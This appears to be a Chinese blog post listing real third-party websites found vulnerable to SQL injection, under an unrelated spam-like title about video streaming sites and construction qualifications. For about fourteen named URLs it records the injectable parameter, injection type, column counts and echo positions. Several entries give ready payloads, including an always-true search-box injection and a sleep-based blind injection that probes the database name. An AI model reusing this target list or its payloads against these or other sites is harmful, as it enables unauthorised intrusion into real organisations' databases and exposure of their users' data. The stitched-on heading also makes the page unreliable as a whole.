怎么做视频直播网站建筑工程资质查询平台
此数据为博主在新手阶段练习sql注入时发现的站点,漏洞可能修复,备注可能错误
url: https://www.uni-1.com.hk/about_en.php?id=2
 注入点类型:数值
 sql报错回显:无
 sql语句执行:[order by] [union]
 字段数:14
 回显点:12,13,14
 url: https://atmos.mora.com.pl/blank.php?id=19088
 注入点类型:数值
 sql报错回显:无
 sql语句执行:顺利
 回显点:1,2,3
 用户权限:低
https://www.csi-india.org/news/index.php?id=18
 注入点类型:数值
 sql报错回显:无
 sql语句执行:顺利
 字段数:8
 回显点:3,4,5,6
http://jwsm.cc/blank.php?id=136
 注入点类型:num
 sql报错回显:无
 权限:普通
https://esjindex.org/search.php?id=2
 注入点类型:字符 
 异常载荷:' 
 sql报错回显:存在
 字段:22
 union联合查询失效
 sleep判断失效
http://www.qdbohai.com/project/list.php
 注入点类型:搜索框
 传参类型:post传参
 输出[all]载荷:keywords=aaaa' or 1=1--+
https://www.sunchampion.com/about.php?id=41
 注入点类型:数值
 传参类型:get
 sql报错回显:存在
 回显点:存在
 sql报错盲注载荷:exreactvalue
url:https://www.zenith.edu.hk/tc/school.php?id=35
 注入点:id=35
 类型:str
 sql报错回显:存在
 页面回显:无,页面自动跳转
 sql报错盲注载荷:exreactvalue
 comment:union非法混合,
url:https://abp.bzh/article.php?id=31347
 类型:str
 sql报错回显:存在
 页面回显:无
 注入方式:sleep延时盲注
 comment:order by失效,union失效
 盲注载荷:' and if((length(database()))=13,sleep(0),sleep(5)) --+
url:https://www.ciritas.ru/faq2.php?id=2
 类型:str
url:https://uppo.pt/announce.php?id=136
 类型:str
 sql报错回显:无
 字段数:19
 comment:union失效,403
url:https://www.spbigbag.com/news_view.php?id=1
 类型:str
